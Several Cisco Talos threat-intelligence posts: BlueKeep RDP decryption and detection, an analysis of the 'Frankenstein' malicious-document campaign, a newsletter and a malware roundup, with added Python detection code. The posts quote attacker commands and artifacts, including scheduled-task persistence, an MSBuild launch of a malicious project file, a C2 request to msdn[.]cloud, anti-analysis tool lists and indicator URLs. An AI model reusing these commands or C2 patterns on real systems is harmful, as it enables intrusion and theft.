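The channel-list check described above, written out as an added example (this is not the Snort rule or any Talos code): it walks the client user data carried in the MCS connect-initial, pulls the static virtual channel names out of the TS_UD_CS_NET block (the TS_UD_HEADER, TS_UD_CS_NET and CHANNEL_DEF layouts are assumed here from the MS-RDPBCGR specification) and reports whether "MS_T120" is among them. The sample client data is constructed; the parser only sees cleartext user data, which is exactly why the encrypted case needs TLS decryption on the sensor.

```python
"""Extract the client's requested virtual channels from RDP client user data
and flag any attempt to bind the server-internal "MS_T120" channel.

Added example, not Talos code or the Snort rule itself. Layout assumed from
MS-RDPBCGR (all fields little-endian):
  TS_UD_HEADER  type:uint16, length:uint16 (length includes the header)
  TS_UD_CS_NET  header, channelCount:uint32, channelCount x CHANNEL_DEF
  CHANNEL_DEF   name:8 bytes (NUL-padded ASCII), options:uint32
Only cleartext data can be parsed; once the client negotiates TLS after the
Connection Confirm, this blob is encrypted and a sensor needs decryption.
"""
import struct
from typing import List, Tuple

CS_CORE = 0xC001  # TS_UD_CS_CORE
CS_NET = 0xC003   # TS_UD_CS_NET


def build_ud_block(block_type: int, payload: bytes) -> bytes:
    """Wrap a payload in a TS_UD_HEADER; length covers header plus payload."""
    return struct.pack("<HH", block_type, 4 + len(payload)) + payload


def build_cs_net(channel_names: List[str]) -> bytes:
    """Build a TS_UD_CS_NET block listing the given static virtual channels."""
    body = struct.pack("<I", len(channel_names))
    for name in channel_names:
        raw = name.encode("ascii")
        if len(raw) > 8:
            raise ValueError("channel name longer than 8 bytes: %r" % name)
        body += raw.ljust(8, b"\x00") + struct.pack("<I", 0)  # options = 0
    return build_ud_block(CS_NET, body)


def parse_client_data(data: bytes) -> List[Tuple[int, bytes]]:
    """Walk the sequence of TS_UD blocks and return (type, payload) pairs.
    Truncated or malformed blocks raise ValueError instead of being skipped,
    so a detector cannot be fooled into reporting "no channels" on bad data."""
    blocks: List[Tuple[int, bytes]] = []
    offset = 0
    while offset < len(data):
        if len(data) - offset < 4:
            raise ValueError("truncated TS_UD_HEADER at offset %d" % offset)
        block_type, length = struct.unpack_from("<HH", data, offset)
        if length < 4 or offset + length > len(data):
            raise ValueError("bad block length %d at offset %d" % (length, offset))
        blocks.append((block_type, data[offset + 4:offset + length]))
        offset += length
    return blocks


def channel_names(cs_net_payload: bytes) -> List[str]:
    """Extract channel names from a TS_UD_CS_NET payload (header removed)."""
    if len(cs_net_payload) < 4:
        raise ValueError("CS_NET payload too short for channelCount")
    (count,) = struct.unpack_from("<I", cs_net_payload, 0)
    if len(cs_net_payload) < 4 + count * 12:
        raise ValueError("channelCount %d exceeds payload length" % count)
    names = []
    for i in range(count):
        raw = cs_net_payload[4 + i * 12:4 + i * 12 + 8]
        names.append(raw.split(b"\x00", 1)[0].decode("ascii", "replace"))
    return names


def requested_channels(client_data: bytes) -> List[str]:
    """All static virtual channels the client asks for in its user data."""
    names: List[str] = []
    for block_type, payload in parse_client_data(client_data):
        if block_type == CS_NET:
            names.extend(channel_names(payload))
    return names


def binds_ms_t120(client_data: bytes) -> bool:
    """True when the client tries to bind MS_T120, which clients are never
    expected to create. The comparison is case-insensitive (my assumption),
    so a differently cased name does not slip past the check."""
    return any(n.upper() == "MS_T120" for n in requested_channels(client_data))


# Constructed samples: a normal client and one reaching for MS_T120. A CS_CORE
# block with placeholder content precedes CS_NET, as in a real connect-initial.
NORMAL_CLIENT = build_ud_block(CS_CORE, b"\x00" * 8) + build_cs_net(["cliprdr", "rdpsnd", "rdpdr"])
SUSPECT_CLIENT = build_ud_block(CS_CORE, b"\x00" * 8) + build_cs_net(["cliprdr", "MS_T120"])

if __name__ == "__main__":
    for label, blob in (("normal", NORMAL_CLIENT), ("suspect", SUSPECT_CLIENT)):
        print(label, requested_channels(blob), "MS_T120 bind:", binds_ms_t120(blob))
```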

While the aforementioned Snort rule can help protect against BlueKeep, it is still possible for attackers to carry out an encrypted attack — essentially sneaking past users and remaining undetected. Unless users set up TLS decryption for RDP on their Firepower device, there is a chance an attacker could exploit CVE-2019-0708 to deliver malware that would have the potential to spread rapidly.

The following is a guide to set up RDP decryption on Cisco Firepower. This guide specifically applies to Windows Server 2008 instances (newer versions of Windows Server are not vulnerable to BlueKeep). Additionally, Windows 7 only allows setting up a custom RDP certificate in the registry. It is possible to export the self-signed RDP certificate and private key in Windows 7 but this requires using the mimikatz tool as the private key for the auto-generated certificate is marked as "not exportable". Considering these hurdles, we focused on Windows Server 2008 for this guide.

*Note this procedure requires an inline Firepower device that supports SSL decryption. For more information, visit: Cisco Next-Generation Intrusion Prevention System (NGIPS) - Cisco.

Steps for RDP Decryption

1. Determine the certificate used by the RDP server
In Windows Server 2008, TLS certificates for RDP are configured in "Remote Desktop Session Host Configuration."

Once the remote desktop host configuration is opened, double-click on any RDP connections and note the certificate used by the RDP server — we will need this later.
2. Export the RDP certificate and private key
Open mmc.exe and navigate to: File -> Add/Remove Snap-in
Select "Certificates" on the left and click "Add."
Click "Computer account," "Next," then "Finish."
Finally, click "OK" to add the certificates snap-in.

Navigate on the left to the Local Computer certificates and locate, on the right, the certificate used by the RDP server we found before in the Remote Desktop Session Host Configuration.

Right click on the certificate and in "All Tasks" click on "Export."
Click "Yes, export the private key" in the Certificate Export Wizard then click "Next."
Make sure "Personal Information Exchange" is selected, then click "Next."
Type in an import password to encrypt the PFX file. Remember this password — we will need it later. Click "Next."
Type in a file name for the PFX file and click "Next."
Finally, click "Finish."

You have successfully exported the RDP certificate and private key.
Now, prepare them for the Firepower appliance.

3. Prepare the RDP certificate and private key for Firepower
For this step, you will need the OpenSSL tool and the PFX file exported in Step 2
(dc1.pfx in this example).
Extract the RDP certificate from the PFX file:
$ openssl pkcs12 -in dc1.pfx -clcerts -nokeys -out cert.pem
Enter Import Password:
The command above asks for the import password, which is the password typed in Step 2.
Extract the RDP private key from the PFX file:
$ openssl pkcs12 -in dc1.pfx -nocerts -out key.pem
Enter Import Password:
Enter PEM pass phrase:
Verifying - Enter PEM pass phrase:
The command above asks for the import password again, as well as a PEM passphrase. Remember this private key passphrase; we will need it when we add the RDP certificate to Firepower.

4. Import the RDP key into Firepower
At this point, you should have the RDP cert "cert.pem," as well as the encrypted RDP private key "key.pem."
Navigate to Objects -> Object Management.
Select "Add Internal Cert" on the top right.
Name the certificate (e.g. the server name) and either paste in the "cert.pem" or browse to the "cert.pem" file in the "Certificate Data" section. Do the same for "key.pem" in the "Key" section. Click the "Encrypted" box and type in the PEM password from Step 3.

You have successfully imported the RDP certificate and private key. Now, create an SSL policy for decryption.

5. Create an SSL policy
Navigate to Policies -> SSL
Select "New Policy."
Enter a policy name and description with default action "Do not decrypt."
Once the policy editor has loaded, select "Add Rule" (top right).
Name the rule and give it the action "Decrypt - Known Key." Click the "with" field and select the certificate you imported earlier in Step 4.
If applicable, select "Source" and "Destination" networks or leave them as "any."
Click on the "Ports" tab and input the TCP port 3389 (if appropriate for your environment) under "Selected Destination Ports" and click "Add."
Under the "Logging" tab, enable logging at the end of the connection if desired.
Click "Add" and then "Save" to save the rule.
Additional SSL documentation is available here.

6. Enable the Intrusion Prevention Rule for BlueKeep
Navigate to Policies -> Access Control -> Intrusion Prevention.
Edit the desired Intrusion Policy.
Filter for Snort ID 50137 "OS-WINDOWS Microsoft Windows RDP MS_T120 channel bind attempt."
Click the checkbox and select Rule State -> Drop and Generate Events.
Click "Policy Information" and commit changes.

7. Configure the Access Control Policy
Navigate to Policies -> Access Control and edit the relevant Access Control Policy.
Under the "Advanced" tab, edit "SSL Policy Settings."
Select the SSL Policy we created in Step 5 and click "OK."
Ensure that your Intrusion Prevention Policy is selected under "Intrusion Policy used before Access Control rule is determined" in the "Network Analysis and Intrusion Policies" section of the "Advanced" tab.
Under the "Rules" tab of your Access Control Policy, ensure you have an appropriate Intrusion Policy set for any "Allow" rules.
If appropriate, enable the Intrusion Prevention Policy for your Default Action, as well.
Save and deploy changes.
Verify RDP connectivity and functionality.

Encrypted Exploit in Action

Let's start this by walking through what happens when the exploit is attempted on an unpatched, unprotected Windows 7 system.
As you can see, when the exploit is launched, it results in a denial of service on the system, as expected. Now we will demonstrate the process once you have enabled the SSL decryption for RDP, described in this blog, and leverage the detection capabilities of Firepower.
In this instance, no denial of service occurs and the system is unaffected, despite the attack being encrypted. Below is a screen capture showing SID 50137 alerting and dropping the encrypted BlueKeep exploit in Firepower.

Conclusion

Over the last several years we have seen several high-profile vulnerabilities affecting various Windows services. Some, if not all, of these services should not be exposed to the internet. To reduce external exposure, organizations need to take additional steps to ensure that services like RDP and SMB are not exposed unless explicitly required, but that does not eliminate the need for patching. This is yet another example of why patching is one of the core fundamental concepts in information security. Vulnerabilities this severe appear periodically, and organizations need to be prepared to respond in a variety of ways. Patching takes time, and making sure that you have detection and prevention in place can require varying levels of effort. In this particular example, SSL decryption is required to get a higher level of visibility and more thorough protection.

As encryption becomes more ingrained in the internet and more applications take advantage of it, these types of steps are going to become more common. Adversaries are always going to look for ways to evade any type of detection and using encryption is a great way to evade some of these technologies. Regardless, Cisco Talos will always be looking at the ways adversaries are operating and developing new and clever techniques to defeat them.

It's alive: Threat actors cobble together open-source pieces into monstrous Frankenstein campaign

This blog was authored by Danny Adamitis, David Maynor and Kendall McKay.

Executive summary

Cisco Talos recently identified a series of documents that we believe are part of a coordinated series of cyber attacks that we are calling the "Frankenstein" campaign. We assess that the attackers carried out these operations between January and April 2019 in an effort to install malware on users' machines via malicious documents. We assess that this activity was hyper-targeted given that there was a low volume of these documents in various malware repositories. Frankenstein — the name refers to the actors' ability to piece together several unrelated components — leveraged four different open-source techniques to build the tools used during the campaign.

The campaign used components of:
  • An article to detect when your sample is being run in a VM
  • A GitHub project that leverages MSbuild to execute a PowerShell command
  • A component of GitHub project called "Fruityc2" to build a stager
  • A GitHub project called "PowerShell Empire" for their agents
We believe that the threat actors behind the Frankenstein campaign are moderately sophisticated and highly resourceful. The actors' preference for open-source solutions appears to be part of a broader trend in which adversaries are increasingly using publicly available solutions, possibly to improve operational security. These obfuscation techniques will require network defenders to modify their posture and procedures to detect this threat.

This report outlines the various anti-detection techniques used throughout the Frankenstein campaign. Some of these techniques included checking to see if any analysis tools, such as Process Explorer, were running in the background and determining whether the sample was inside of a virtual machine. The threat actors also took additional steps to only respond to GET requests that contained predefined fields, such as a non-existent user-agent string, a session cookie, and a particular directory on the domain. The threat actors also used different types of encryption in order to protect data in transit.

Trojanized documents

Talos has identified two different infection vectors associated with this particular campaign. In order to compromise their victims, the threat actors sent the trojanized Microsoft Word documents, probably via email. The first vector relies on a trojanized document that fetches a remote template and then uses a known exploit. The second vector is a trojanized Word document that prompts the victim to enable macros and run a Visual Basic script. We were able to correlate these two techniques to the same threat campaign due to overlapping threat actor C2.

In the first scenario, Talos discovered a document named "MinutesofMeeting-2May19.docx" that appeared to display the national flag of Jordan. Once the victim opens the document, it fetches a remote template from the actor-controlled website, hxxp://droobox[.]online:80/luncher.doc. Once luncher.doc was downloaded, it used CVE-2017-11882 to execute code on the victim's machine. After the exploit, the file would run a command script to set up persistence as a scheduled task named "WinUpdate".

"/Create /F /SC DAILY /ST 09:00 /TN WinUpdate /TR"

That scheduled task would run a series of base64-encoded PowerShell commands that acted as a stager. The stager will be described in more detail in the next section.

Example of the MinutesofMeeting-2May19.docx.
One of the samples we analyzed that prompted the victim to enable macros claimed to have "been secured by Kaspersky," a well-known anti-virus firm. While threat actors commonly create fake security labels for malicious documents, this technique could also indicate that the threat actor had performed reconnaissance on the intended victims, suggesting that the documents had been socially engineered to some degree.

Example of malicious Microsoft Word document.
Two other documents we associated with this group appeared to be more targeted in nature. One document contained logos that appear to be from several Middle Eastern countries' government agencies, while the other document showed an image of unspecified buildings that were possibly recognizable to a select group of targets.
Trojanized document containing official logos.
Trojanized document containing the image of unidentified buildings.

Visual Basic script and its anti-analysis features

As soon as the user enabled the macro, a robust Visual Basic Application (VBA) script began to execute. The VBA script contained two anti-analysis features. First, it would query Windows Management Instrumentation (WMI) to check if any of the following applications were running:
  • VMWare
  • Vbox
  • Process Explorer
  • Process Hacker
  • ProcMon
  • Visual Basic
  • Fiddler
  • WireShark
Next, the script would check to see if any of the following tasks were running:
  • VMWare
  • Vbox
  • VxStream
  • AutoIT
  • VMtools
  • TCPView
  • WireShark
  • Process Explorer
  • Visual Basic
  • Fiddler
A copy of the macro's code, which checks for analysis-oriented applications.
If any of the aforementioned applications or task names were discovered during the enumeration process, the script would stop execution. The next evasion technique was to call WMI and determine the number of cores allocated to the system. If the number of cores was less than two, the script would stop execution and the end user would receive a pop-up message stating "The File is not compatible with your Microsoft Office Version." We assess that this technique was modeled after a 2015 TrustedSec report as a way to detect if the sample was being run in a virtual machine or a sandbox environment.

Once the evasion checks were complete, the threat actors used MSbuild to execute an actor-created file named "LOCALAPPDATA\Intel\instal.xml". Based on lexical analysis, we assess with high confidence that this component of the macro script was based on an open-source project called "MSBuild-inline-task." While this technique was previously documented last year, it has rarely been observed being used in operations. Talos suspects the adversary chose MSBuild because it is a signed Microsoft binary, meaning that it can bypass application whitelisting controls on the host when being used to execute arbitrary code.

A copy of the threat actors' version of the MSbuild-inline-task.
The last line of the file would run encoded commands from the command line:
cmd.exe /c C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe LOCALAPPDATA\Intel\instal.xml C:\Windows\System32
Once the "instal.xml" file began execution, it would deobfuscate the base64-encoded commands. This revealed a stager, or a small script designed to obtain an additional payload. While analyzing this stager, we noticed some similarities to the "Get-Data" function of the FruityC2 PowerShell agent. One notable difference is that this particular stager included functionality that allowed the stager to communicate with the command and control (C2) via an encrypted RC4 byte stream. In this sample, the threat actors' C2 server was the domain msdn[.]cloud. A copy of the deobfuscated stager can be seen in the image below.
Copy of the deobfuscated stager.
When executed successfully, the stager connected to the C2. However, in order to receive the agent, the request needed to contain the correct directory, user-agent string, and session cookie. The anticipated GET request appeared as follows:
GET /FC001/JOHN HTTP/1.1
Cookie: session=drYuSCFQdbQYHozM2dku17KYkY8=
User-Agent: Microsoft Internet Explorer
Host: msdn[.]cloud
Connection: Keep-Alive
If successful, the C2 would return a string of characters. Once the string was RC4 decrypted, it launched a PowerShell Empire agent. The PowerShell script would attempt to enumerate the host to look for certain information, such as:
  • Username
  • Domain name
  • Machine name
  • Public IP address
  • Checks if the current user has administrative privileges
  • Obtains a list of all currently running processes
  • Calls WMI to obtain operating system version
  • Obtains the security system's SHA256 HMAC
Once the aforementioned information was obtained, it was sent back to the threat actor's C2. Similar to the stager, the agent included functionality to communicate via an encrypted channel, in this case AES-CBC, in addition to using a specific user-agent string and a session key. This agent would allow the threat actors to remotely interact with the agent to upload and download files and to use the various plugins that were compatible with the Empire framework, such as those used to harvest credentials on the victim's machine. While this threat actor exhibited signs of sophistication, there were some small components that were overlooked. For example, it appears that the threat actor forgot to configure certain components for the Empire agent, such as leaving placeholder values for some variables like "WORKING_HOURS_REPLACE" and "REPLACE_KILLDATE".
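Detection logic for the tradecraft described in this section, as an added example (not Talos code or any of the campaign's scripts): it flags MSBuild running an .xml "project" out of the user's AppData\Local directory, a scheduled task whose action launches encoded PowerShell, and the stager's bare "Microsoft Internet Explorer" user-agent together with the request paths from the IOCs below. The process events and proxy log lines are constructed, and the field names (image, command_line, parent_image) are assumptions modelled on Sysmon-style process-creation telemetry.

```python
"""Detections for the Frankenstein tradecraft described above: MSBuild
running an inline-task project out of the user's profile, a scheduled task
that launches encoded PowerShell, and the stager's bare user-agent string.

Added example, not Talos code. All events and log lines are constructed for
this demonstration; the field names (image, command_line, parent_image) are
assumptions modelled on Sysmon-style process-creation telemetry.
"""
import re
from typing import Dict, List

# Constructed process-creation events: two modelled on the campaign, one benign.
PROCESS_EVENTS: List[Dict[str, str]] = [
    {"image": r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe",
     "command_line": r"MSBuild.exe C:\Users\alice\AppData\Local\Intel\instal.xml C:\Windows\System32",
     "parent_image": r"C:\Windows\System32\cmd.exe"},
    {"image": r"C:\Windows\System32\schtasks.exe",
     # QUFBQQ== is a placeholder payload (base64 of "AAAA"), not the real one.
     "command_line": r'schtasks.exe /Create /F /SC DAILY /ST 09:00 /TN WinUpdate /TR "powershell -enc QUFBQQ=="',
     "parent_image": r"C:\Windows\System32\cmd.exe"},
    {"image": r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe",
     "command_line": r"MSBuild.exe C:\src\app\app.csproj /t:Build",
     "parent_image": r"C:\Program Files\Microsoft Visual Studio\Common7\IDE\devenv.exe"},
]

# Constructed proxy log lines: source, method, URL, user-agent, cookie.
PROXY_LOG: List[str] = [
    '10.0.0.5 GET http://msdn[.]cloud/FC001/JOHN "Microsoft Internet Explorer" "session=drYuSCFQdbQYHozM2dku17KYkY8="',
    '10.0.0.7 GET http://intranet.example/index.html "Mozilla/5.0 (Windows NT 10.0; Win64; x64) Edge/44.0" "-"',
]

PROXY_RE = re.compile(r'^(?P<src>\S+) (?P<method>\S+) (?P<url>\S+) "(?P<ua>[^"]*)" "(?P<cookie>[^"]*)"$')
# URL paths taken from the IOCs published with this post.
KNOWN_C2_PATHS = ("/FC001/", "/FC003/")


def check_process(event: Dict[str, str]) -> List[str]:
    """Return the names of the detections that fire on one process event."""
    hits: List[str] = []
    image = event["image"].lower()
    cmd = event["command_line"]
    lower = cmd.lower()
    if image.endswith("\\msbuild.exe"):
        # MSBuild normally builds a .csproj/.sln; an .xml "project" under the
        # user's AppData\Local matches the MSBuild-inline-task technique.
        for arg in cmd.split()[1:]:
            if arg.startswith("/"):
                continue  # a switch, not a project path
            a = arg.lower()
            if a.endswith(".xml") or "\\appdata\\local\\" in a:
                hits.append("msbuild_inline_task_project")
                break
        if event["parent_image"].lower().endswith("\\cmd.exe"):
            hits.append("msbuild_spawned_by_cmd")
    if image.endswith("\\schtasks.exe") and "/create" in lower:
        m = re.search(r"/TN\s+(\S+)", cmd, re.IGNORECASE)
        task = m.group(1) if m else "?"
        # -e, -ec, -enc and -encodedcommand are all accepted by PowerShell.
        if "powershell" in lower and re.search(r"\s-e(c|nc|ncodedcommand)?\b", lower):
            hits.append("scheduled_task_encoded_powershell:" + task)
    return hits


def check_proxy_line(line: str) -> List[str]:
    """Flag the stager's request shape: a user-agent that no real browser
    sends, and a request path from the published IOCs."""
    m = PROXY_RE.match(line)
    if not m:
        return ["unparsed_line"]
    hits: List[str] = []
    # Real IE sends "Mozilla/... MSIE ..." or "... Trident/..."; never this.
    if m.group("ua").strip() == "Microsoft Internet Explorer":
        hits.append("bare_ie_user_agent")
    if any(p in m.group("url") for p in KNOWN_C2_PATHS):
        hits.append("known_c2_path")
    return hits


def run_detections() -> Dict[str, List[str]]:
    """Run every detection over the constructed data, keyed by record id."""
    results: Dict[str, List[str]] = {}
    for i, ev in enumerate(PROCESS_EVENTS):
        results["proc%d" % i] = check_process(ev)
    for i, line in enumerate(PROXY_LOG):
        results["proxy%d" % i] = check_proxy_line(line)
    return results


if __name__ == "__main__":
    for key, hits in run_detections().items():
        print(key, hits or "clean")
```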

Conclusion

The actors' preference for open-source solutions appears to be part of a broader trend in which adversaries are increasingly using publicly available tools, which offer them some advantages over a completely custom toolset. A campaign that leverages custom tools is more easily attributed to the tools' developers. One example of this was the code overlap in the VPNFilter malware that allowed us to associate the activity with the BlackEnergy malware. By contrast, operations performed with open-source frameworks are extremely difficult to attribute without additional insights or intelligence. Over the past several years, there have been multiple instances of advanced threat actors using open-source techniques, such as MuddyWater, among others. This growing trend highlights that highly trained operators are increasingly using unsophisticated tools to accomplish their goals.

Coverage

Ways our customers can detect and block this threat are listed below.

Advanced Malware Protection (AMP) is ideally suited to prevent the execution of the malware detailed in this post. Below is a screenshot showing how AMP can protect customers from this threat. Try AMP for free here.


Cisco Cloud Web Security (CWS) or Web Security Appliance (WSA) web scanning prevents access to malicious websites and detects malware used in these attacks.

Email Security can block malicious emails sent by threat actors as part of their campaign.

Network Security appliances such as Next-Generation Firewall (NGFW), Next-Generation Intrusion Prevention System (NGIPS), and Meraki MX can detect malicious activity associated with this threat.

Threat Grid helps identify malicious binaries and build protection into all Cisco Security products.

Umbrella, our secure internet gateway (SIG), blocks users from connecting to malicious domains, IPs, and URLs, whether users are on or off the corporate network.

Additional protections with context to your specific environment and threat data are available from the Firepower Management Center.

Open Source Snort Subscriber Rule Set customers can stay up to date by downloading the latest rule pack available for purchase on Snort.org.

Indicators of Compromise

Hashes

URLs
hxxp://droobox[.]online/luncher.doc
hxxp://msdn[.]cloud/FC001/JOHN
hxxp://search-bing[.]site/FC003/User=H6szn1woY2pLV

Domains
msdn[.]cloud
search-bing[.]site
droobox[.]online

Threat Source newsletter (June 6)


Newsletter compiled by Jonathan Munshaw.

Welcome to this week’s Threat Source newsletter — the perfect place to get caught up on all things Talos from the past week.

We hope to see everyone this weekend at the Talos Threat Research Summit in San Diego (or throughout the week at Cisco Live). If you’re around, stop by the Talos booth on the Cisco Live floor — who knows, we may have some swag to give out! For those of you who are attending, brush up on the schedule here.

There’s been a lot of talk about a bug in Microsoft RDP that could leave systems open to a “wormable” attack. When Microsoft disclosed the vulnerability last month, there was little guidance on how to defend against an exploit. Now, we have a new method using Cisco Firepower to block any encrypted attacks attempting to use this vulnerability. This means that you’ll be able to protect against attacks that would otherwise go undetected.

This week, we also unveiled our research on Frankenstein, a new campaign that cobbles together several open-source techniques to infect users. While it’s been used with relatively low volume so far, because of its nature, the attackers behind it have the ability to change it on the fly and evolve over time.

Finally, we also have our weekly Threat Roundup, which you can find on the blog every Friday afternoon. There, we go over the most prominent threats we’ve seen (and blocked) over the past week.

Upcoming public engagements with Talos

Event: “It’s never DNS...It was DNS: How adversaries are abusing network blind spots” at SecTor
Location: Metro Toronto Convention Center, Toronto, Canada
Date: Oct. 7 - 10
Speaker: Edmund Brumaghin and Earl Carter
Synopsis: While DNS is one of the most commonly used network protocols in most corporate networks, many organizations don’t give it the same level of scrutiny as other network protocols present in their environments. DNS has become increasingly attractive to both red teams and malicious attackers alike to easily subvert otherwise solid security architectures. This presentation will provide several technical breakdowns of real-world attacks that have been seen leveraging DNS for a variety of purposes such as DNSMessenger, DNSpionage, and more. 

Cyber Security Week in Review

  • Security researchers say the EternalBlue exploit was not used in a ransomware attack on the city of Baltimore. Local and state officials in Maryland had demanded answers from the National Security Administration, where the exploit was originally developed.
  • Apple unveiled a new sign-on mechanism that will allow users to log in to certain sites using their Apple ID. The company says it will make it more difficult for third-party apps to track and store users’ information.
  • Chinese tech company Huawei reached an agreement with Russia to build out the country’s 5G network. Huawei has been locked in a battle with the U.S. recently after the U.S. banned the company’s products.
  • The U.S. State Department sent a plan to Congress to establish a new $20.8 million cybersecurity department. The new Bureau of Cyberspace Security and Emerging Technologies (CSET) would “lead U.S. government diplomatic efforts to secure cyberspace and its technologies, reduce the likelihood of cyber conflict, and prevail in strategic cyber competition.”
  • A major university in Australia says hackers stole 19 years’ worth of personal information on its students and faculty. Officials with Australian National University say the attack impacted about 200,000 people, including their credit card numbers, names, addresses, dates of birth and more.
  • A zero-day vulnerability in Mac Mojave could allow an attacker to bypass security measures and run malicious code. The bug allows malicious users to mimic mouse clicks, bypass security measures, and then run whitelisted apps that have been manipulated to run malicious code.
  • Medical testing company LabCorp says millions of customers had their information leaked as part of a cyberattack at a third-party firm. The company said the American Medical Collection Agency had their information stolen at various times between August 2018 and March 2019.
  • Cisco patched two high-severity vulnerabilities in its Industrial Network Director. The bugs could allow an attacker to gain the ability to execute code remotely, or cause a denial-of-service condition.
  • The attackers behind the GandCrab ransomware say they are retiring after earning millions of dollars from the attack. The group claims on a forum post they made $2 billion during the malware’s lifecycle.

Notable recent security issues

Title: Attackers exploit bug in popular WordPress plugin to inject malicious JavaScript
Description: Attackers are exploiting a recently patched bug in a WordPress plugin that allows them to redirect users to malicious sites. The vulnerability exists in the content management system’s instant chat plugin, which can allow site managers to communicate directly with users. The bug allows attackers to inject malicious JavaScript into these sites, sending them to attacker-controlled websites or displaying malicious pop-ups.
Snort SIDs: 50299


Title: Cisco Firepower protects against encrypted attacks exploiting Microsoft RDP bug
Description: Researchers at Cisco Talos discovered a new way to protect against encrypted attacks exploiting a recently disclosed vulnerability in Microsoft RDP. Microsoft disclosed the bug in May, but did not provide any guidance on how to mitigate attacks. A new method using Cisco Firepower Management Center allows users to protect themselves from attacks that would otherwise go virtually undetected.
Snort SIDs: 50137 

Most prevalent malware files this week

SHA 256: 3f6e3d8741da950451668c8333a4958330e96245be1d592fcaa485f4ee4eadb3
MD5: 47b97de62ae8b2b927542aa5d7f3c858
Typical Filename: qmreportupload.exe
Claimed Product: qmreportupload
Detection Name: Win.Trojan.Generic::in10.talos

SHA 256: 144e4b5a6e99d9e89dae2ac2907c313d253878e13db86c6f5c50dae6e17a015a
MD5: 5e3b592b8e093f92ae9f6cfc93b22c58
Typical Filename: pupdate.exe
Claimed Product: Internet Explorer
Detection Name: W32.144E4B5A6E-95.SBX.TG

SHA 256: c3e530cc005583b47322b6649ddc0dab1b64bcf22b124a492606763c52fb048f 
MD5: e2ea315d9a83e7577053f52c974f6a5a
Typical Filename: Tempmf582901854.exe
Claimed Product: N/A
Detection Name: W32.AgentWDCR:Gen.21gn.1201

SHA 256: 15716598f456637a3be3d6c5ac91266142266a9910f6f3f85cfd193ec1d6ed8b
MD5: 799b30f47060ca05d80ece53866e01cc
Typical Filename: 15716598f456637a3be3d6c5ac91266142266a9910f6f3f85cfd193ec1d6ed8b.bin
Claimed Product: N/A
Detection Name: W32.Generic:Gen.22fz.1201

SHA 256: 7acf71afa895df5358b0ede2d71128634bfbbc0e2d9deccff5c5eaa25e6f5510 
MD5: 4a50780ddb3db16ebab57b0ca42da0fb
Typical Filename: wup.exe
Claimed Product: N/A 
Detection Name: W32.7ACF71AFA8-95.SBX.TG

Threat Roundup for May 31 to June 7


Today, Talos is publishing a glimpse into the most prevalent threats we've observed between May 31 and June 07. As with previous roundups, this post isn't meant to be an in-depth analysis. Instead, this post will summarize the threats we've observed by highlighting key behavioral characteristics, indicators of compromise, and discussing how our customers are automatically protected from these threats.

As a reminder, the information provided for the following threats in this post is non-exhaustive and current as of the date of publication. Additionally, please keep in mind that IOC searching is only one part of threat hunting. Spotting a single IOC does not necessarily indicate maliciousness. Detection and coverage for the following threats are subject to updates, pending additional threat or vulnerability analysis. For the most current information, please refer to your Firepower Management Center, Snort.org, or ClamAV.net.

For each threat described below, this blog post only lists 25 of the associated file hashes and up to 25 IOCs for each category. An accompanying JSON file can be found here that includes the complete list of file hashes, as well as all other IOCs from this post. As always, please remember that all IOCs contained in this document are indicators, and one single IOC does not indicate maliciousness.

The most prevalent threats highlighted in this roundup are:

  • Win.Malware.Cerber-6984447-1
    Malware
    Cerber is ransomware that encrypts documents, photos, databases and other important files using the file extension ".cerber."
     
  • Win.Malware.Ircbot-6984710-0
    Malware
    Ircbot, also known as Eldorado, is known for injecting into processes, spreading to removable media, and gaining execution via Autorun.inf files.
     
  • Win.Malware.Kovter-6985541-0
    Malware
    Kovter is known for its fileless persistence mechanism. This family of malware creates several malicious registry entries which store its malicious code. Kovter is capable of reinfecting a system, even if the file system has been cleaned of the infection. Kovter has been used in the past to spread ransomware and click-fraud malware.
     
  • Win.Malware.Lokibot-6987581-1
    Malware
    Lokibot is an information-stealing malware designed to siphon off sensitive information stored on an infected device. It is modular in nature, supporting the ability to steal sensitive information from a number of popular applications. It is commonly pushed via malicious documents delivered via spam emails.
     
  • Win.Malware.Remcos-6985941-1
    Malware
    Remcos is a remote access trojan (RAT) that allows attackers to execute commands on the infected host, log keystrokes, interact with a webcam, and capture screenshots. Remcos is commonly delivered through Microsoft Office documents with macros, sent as attachments on malicious emails.
     
  • Win.Malware.Tofsee-6988429-1
    Malware
    Tofsee is multi-purpose malware that features a number of modules used to carry out various activities such as sending spam messages, conducting click fraud, mining cryptocurrency, and more. Infected systems become part of the Tofsee spam botnet and are used to send large volumes of spam messages in an effort to infect additional systems and increase the overall size of the botnet under the operator’s control.
     
  • Win.Packed.Zbot-6986485-1
    Packed
    Zbot, also known as Zeus, is a trojan that steals information such as banking credentials using methods such as key-logging and form grabbing.
     
  • Win.Ransomware.Sage-6987538-1
    Ransomware
    The Sage ransomware encrypts files and then demands a payment for the files to be recovered. Sage typically spreads via malicious email attachments, and the encrypted file extensions vary.
     
  • Win.Worm.Vobfus-6986418-0
    Worm
    Vobfus is a worm that copies itself to external drives and attempts to gain automatic code execution via autorun.inf files. It also modifies the registry so that it will launch when the system is booted. Once installed, it attempts to download follow-on malware from its command and control (C2) servers.
     


Threats

Win.Malware.Cerber-6984447-1


Indicators of Compromise


Registry Key | Value Name | Occurrences
<HKCU>\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer | - | 21
<HKLM>\BCD00000000\OBJECTS\{926583E4-EF64-11E4-BEED-D6738078AD98}\ELEMENTS\16000009 | - | 19
<HKLM>\BCD00000000\OBJECTS\{926583E4-EF64-11E4-BEED-D6738078AD98}\ELEMENTS\16000009 | Element | 19
<HKCU>\Printers\Defaults\{21A3D5EE-E123-244A-98A1-8E36C26EFF6D} | - | 19
<HKCU>\PRINTERS\Defaults | - | 19
<HKLM>\BCD00000000\OBJECTS\{926583E4-EF64-11E4-BEED-D6738078AD98}\ELEMENTS\250000e0 | - | 19
<HKLM>\BCD00000000\OBJECTS\{926583E4-EF64-11E4-BEED-D6738078AD98}\ELEMENTS\250000E0 | Element | 19
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\POLICIES\EXPLORER | Run | 19
<HKCU>\SOFTWARE\MICROSOFT\COMMAND PROCESSOR | AutoRun | 19
<HKCU>\CONTROL PANEL\DESKTOP | SCRNSAVE.EXE | 19
